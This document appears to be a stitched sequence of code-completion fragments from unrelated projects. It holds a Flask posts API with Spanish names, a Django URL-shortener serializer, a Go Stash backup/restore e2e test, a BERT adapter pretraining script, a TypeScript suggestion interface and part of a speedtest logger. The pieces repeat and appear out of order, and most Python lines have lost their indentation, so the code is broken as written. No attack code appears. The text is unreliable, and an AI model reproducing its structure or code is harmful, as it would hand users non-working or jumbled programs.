        Guardados.append(str(db.session.query(Guarda).filter(Guarda.Usuario_Nicka == current_user, Guarda.id == r).count()))
for r in resultss:
vector1 += r
for r in resultsss:
vector2 += r
vector3 = []
vector4 = []
vector5 = []
for r in vector0:
link = select([Recomendacion.link]).where((Recomendacion.id == r))
titulo = select([Recomendacion.titulo]).where((Recomendacion.id == r))
autor = select([Recomendacion.autor]).where((Recomendacion.id == r))
resulta = db.session.execute(link)
resultaa = db.session.execute(titulo)
resultaaa = db.session.execute(autor)
for a in resulta:
vector3 +=a
for a in resultaa:
vector4 +=a
for a in resultaaa:
vector5 +=a
fila = {
"id": vector0,
"link": vector3,
"titulo": vector4,
"autor": vector5,
"nick": current_user,
"descripcion": vector1,
"timestamp": vector2,
"nlikes": Gustas,
"ncomentarios": Comentarios,
"nguardados": Guardados,
"usuario": Nombre_de_usuario,
#"likemio",
#"guardadomio"
}
return fila
@app.route('/display2/<filename>')
def pdf(filename):
return redirect(url_for('static', filename='pdf/' + filename),code = 301)
@app.route('/getPostsRecomendados', methods=['GET'])
@token_required
def getPostsRecomendados(current_user):
data= request.get_json()
x = select([Usuario.Nombre_de_usuario]).where((Usuario.nick == current_user))
resultb = db.session.execute(x)
Nombre_de_usuario = ""
for b in resultb:
Nombre_de_usuario=b.Nombre_de_usuario
id = select([Publicacion.id]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
descripcion = select( [Publicacion.descripcion]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
timestamp = select([Publicacion.timestamp]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
results = db.session.execute(id)
resultss = db.session.execute(descripcion)
resultsss = db.session.execute(timestamp)
vector0 = []
vector1 = []
vector2 = []
Gustas = []
Comentarios= []
Guardados= []
for r in results:
#print(str(r))
vector0 += r
        Gustas.append(str(db.session.query(Gusta).filter(Gusta.Usuario_Nicka == current_user, Gusta.id == r).count()))
        Comentarios.append(str(db.session.query(Comenta).filter(Comenta.Usuario_Nicka == current_user, Comenta.id == r).count()))
        Guardados.append(str(db.session.query(Guarda).filter(Guarda.Usuario_Nicka == current_user, Guarda.id == r).count()))
for r in resultss:
vector1 += r
for r in resultsss:
vector2 += r
vector3 = []
vector4 = []
vector5 = []
for r in vector0:
link = select([Recomendacion.link]).where((Recomendacion.id == r))
titulo = select([Recomendacion.titulo]).where((Recomendacion.id == r))
autor = select([Recomendacion.autor]).where((Recomendacion.id == r))
resulta = db.session.execute(link)
resultaa = db.session.execute(titulo)
resultaaa = db.session.execute(autor)
for a in resulta:
vector3 +=a
for a in resultaa:
vector4 +=a
for a in resultaaa:
vector5 +=a
fila = {
"id": vector0,
"link": vector3,
"titulo": vector4,
"autor": vector5,
"nick": current_user,
"descripcion": vector1,
"timestamp": vector2,
"nlikes": Gustas,
"ncomentarios": Comentarios,
"nguardados": Guardados,
"usuario": Nombre_de_usuario,
#"likemio",
#"guardadomio"
}
return fila
def check_email(email):
    regex = r'^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$'
if(re.search(regex,email)):
return True
else:
return False
# Passwords must be between 8 and 32 characters.
def check_password(password):
    regex = r'^(?=.*[0-9])(?=.*[a-z])(?=.*[A-Z])(?=.*[*.!@$%^&(){}\[\]:;<>,.?/~_+\-=|]).{8,32}$'
if(re.search(regex,password)):
return True
else:
return False
if __name__ == '__main__':
app.run(debug=True)
|
timestamp = select([Publicacion.timestamp]).where(Publicacion.Usuario_Nicka == current_user).order_by(Publicacion.id.desc())
results = db.session.execute(id)
resultss = db.session.execute(descripcion)
|
serializers.py
|
from rest_framework import serializers
from django.core.validators import URLValidator
from django.core.exceptions import ValidationError
from .models import User
from .models import ShortenedUrl
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "email", "username", "fullname", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['email'], validated_data['username'],
validated_data['fullname'], validated_data['password'])
|
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "email", "username", "fullname")
class ShortenBodySerializer(serializers.ModelSerializer):
class Meta:
model = ShortenedUrl
fields = ("id", "original_url", "shortened_url")
def validate(self, data):
url_validator = URLValidator()
        if len(data["shortened_url"]) > 10:
            raise serializers.ValidationError("Shortened URL must be at most 10 characters")
try:
url_validator(data["original_url"])
except ValidationError:
raise serializers.ValidationError("Invalid URL to Shorten")
return data
class ShortenUrlSerializer(serializers.ModelSerializer):
class Meta:
model = ShortenedUrl
fields = ("id", "user", "original_url", "shortened_url")
|
return user
|
replicaset.go
|
/*
Copyright The Stash Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package workloads
import (
|
"context"
"stash.appscode.dev/apimachinery/apis"
"stash.appscode.dev/apimachinery/apis/stash/v1beta1"
"stash.appscode.dev/stash/test/e2e/framework"
. "stash.appscode.dev/stash/test/e2e/matcher"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
var _ = Describe("ReplicaSet", func() {
var f *framework.Invocation
BeforeEach(func() {
f = framework.NewInvocation()
})
JustAfterEach(func() {
f.PrintDebugInfoOnFailure()
})
AfterEach(func() {
err := f.CleanupTestResources()
Expect(err).NotTo(HaveOccurred())
})
Context("ReplicaSet", func() {
Context("Restore in same ReplicaSet", func() {
It("should Backup & Restore in the source ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(1), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Simulate disaster scenario. Delete the data from source PVC
By("Deleting sample data from source ReplicaSet")
err = f.CleanupSampleDataFromWorkload(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in the original ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(rs.ObjectMeta, repo, apis.KindReplicaSet, framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(rs.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
Context("Restore in different ReplicaSet", func() {
It("should restore backed up data into different ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(1), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Deploy restored ReplicaSet
restoredRS, err := f.DeployReplicaSet(framework.RestoredReplicaSet, int32(1), framework.RestoredVolume)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in different ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(restoredRS.ObjectMeta, repo, apis.KindReplicaSet, framework.RestoredVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(restoredRS.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
Context("Leader election for backup and restore ReplicaSet", func() {
It("Should leader elect and backup and restore ReplicaSet", func() {
// Deploy a ReplicaSet
rs, err := f.DeployReplicaSet(framework.SourceReplicaSet, int32(2), framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
// Generate Sample Data
sampleData, err := f.GenerateSampleData(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Setup a Minio Repository
repo, err := f.SetupMinioRepository()
Expect(err).NotTo(HaveOccurred())
// Setup workload Backup
backupConfig, err := f.SetupWorkloadBackup(rs.ObjectMeta, repo, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
By("Waiting for leader election")
f.CheckLeaderElection(rs.ObjectMeta, apis.KindReplicaSet, v1beta1.ResourceKindBackupConfiguration)
// Take an Instant Backup of the Sample Data
backupSession, err := f.TakeInstantBackup(backupConfig.ObjectMeta, v1beta1.BackupInvokerRef{
Name: backupConfig.Name,
Kind: v1beta1.ResourceKindBackupConfiguration,
})
Expect(err).NotTo(HaveOccurred())
By("Verifying that BackupSession has succeeded")
completedBS, err := f.StashClient.StashV1beta1().BackupSessions(backupSession.Namespace).Get(context.TODO(), backupSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedBS.Status.Phase).Should(Equal(v1beta1.BackupSessionSucceeded))
// Simulate disaster scenario. Delete the data from source PVC
By("Deleting sample data from source ReplicaSet")
err = f.CleanupSampleDataFromWorkload(rs.ObjectMeta, apis.KindReplicaSet)
Expect(err).NotTo(HaveOccurred())
// Restore the backed up data
By("Restoring the backed up data in the original ReplicaSet")
restoreSession, err := f.SetupRestoreProcess(rs.ObjectMeta, repo, apis.KindReplicaSet, framework.SourceVolume)
Expect(err).NotTo(HaveOccurred())
By("Verifying that RestoreSession succeeded")
completedRS, err := f.StashClient.StashV1beta1().RestoreSessions(restoreSession.Namespace).Get(context.TODO(), restoreSession.Name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
Expect(completedRS.Status.Phase).Should(Equal(v1beta1.RestoreSessionSucceeded))
// Get restored data
restoredData := f.RestoredData(rs.ObjectMeta, apis.KindReplicaSet)
// Verify that restored data is same as the original data
By("Verifying restored data is same as the original data")
Expect(restoredData).Should(BeSameAs(sampleData))
})
})
})
})
| |
run_pretraining_adapter.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run masked LM/next sentence masked_lm pre-training for BERT."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_integer(
|
flags.DEFINE_integer(
"max_predictions_per_seq", 20,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids, masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
total_loss = masked_lm_loss + next_sentence_loss
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metrics = (metric_fn, [
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
])
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
eval_metrics=eval_metrics,
scaffold_fn=scaffold_fn)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
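
# Illustrative standalone sketch (numpy instead of TF, not part of the original
# file) of the weighted mean above: padded prediction slots carry label_weight
# 0.0 and so contribute nothing, while the 1e-5 in the denominator guards
# against division by zero for an all-padding batch.
def _weighted_lm_loss_example():
  import numpy as np
  per_example_loss = np.array([2.3, 1.7, 0.9, 0.0])  # last slot is padding
  label_weights = np.array([1.0, 1.0, 1.0, 0.0])
  numerator = np.sum(label_weights * per_example_loss)
  denominator = np.sum(label_weights) + 1e-5
  return numerator / denominator  # ~1.633, the mean over the 3 real predictions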
def get_next_sentence_output(bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
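
# Illustrative standalone numpy sketch (not part of the original file) of the
# flat-offset trick in gather_indexes: positions within sequence i become
# indices into the flattened [batch_size * seq_length, width] tensor by adding
# i * seq_length to them.
def _gather_indexes_example():
  import numpy as np
  batch_size, seq_length, width = 2, 4, 3
  sequence = np.arange(batch_size * seq_length * width).reshape(
      batch_size, seq_length, width)
  positions = np.array([[1, 3], [0, 2]])  # masked positions per sequence
  flat_offsets = (np.arange(batch_size) * seq_length).reshape(-1, 1)
  flat_positions = (positions + flat_offsets).reshape(-1)  # [1, 3, 4, 6]
  flat_sequence = sequence.reshape(batch_size * seq_length, width)
  return flat_sequence[flat_positions]  # the gathered [4, width] vectors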
def input_fn_builder(input_files,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
name_to_features = {
"input_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.FixedLenFeature([1], tf.int64),
}
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
# out-of-range exceptions.
d = d.repeat()
# We must `drop_remainder` on training because the TPU requires fixed
# size dimensions. For eval, we assume we are evaluating on the CPU or GPU
    # and we *don't* want to drop the remainder, otherwise we won't cover
# every sample.
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True))
return d
return input_fn
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=20,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size)
if FLAGS.do_train:
tf.logging.info("***** Running training *****")
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)
if FLAGS.do_eval:
tf.logging.info("***** Running evaluation *****")
tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size)
eval_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
result = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)
output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
with tf.gfile.GFile(output_eval_file, "w") as writer:
tf.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
|
"max_seq_length", 128,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
|
suggestion.model.ts
|
import { Facet } from './facet/facet.model';
import { NamedModel } from './named-model.model';
import { Previewable } from './previewable.model';
/**
 * A suggestion represents a query that has been proposed to the user, e.g. due to being popular,
 * matching the current search query
|
*
* @public
*/
export interface Suggestion extends NamedModel<'QuerySuggestion' | 'PopularSearch'>, Previewable {
// eslint-disable-next-line jsdoc/require-description-complete-sentence
/** {@inheritDoc Previewable.facets} */
facets: Facet[];
/**
* Unique identifier of the suggestion.
*
* @deprecated - The key field should be calculated if needed using the `query` and the
* `facets` properties.
*/
key: string;
}
| |
speed_test.py
|
import datetime
import logging
import sys
from speedtest import Speedtest
from conntestd.db import get_db_session
from conntestd.db import SpeedTestResult
from conntestd.config import DB_CONN
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=logging.INFO,
stream=sys.stdout)
def run_speedtest():
|
logging.info("Starting periodic connection test job.")
db = get_db_session(DB_CONN)
db_result = SpeedTestResult(dt=datetime.datetime.now(),
status='running')
db.add(db_result)
db.commit()
try:
s = Speedtest()
s.get_best_server()
s.download()
s.upload()
result = s.results.dict()
download = result['download']
upload = result['upload']
ping = result['ping']
country = result['server']['country']
town = result['server']['name']
sponsor = result['server']['sponsor']
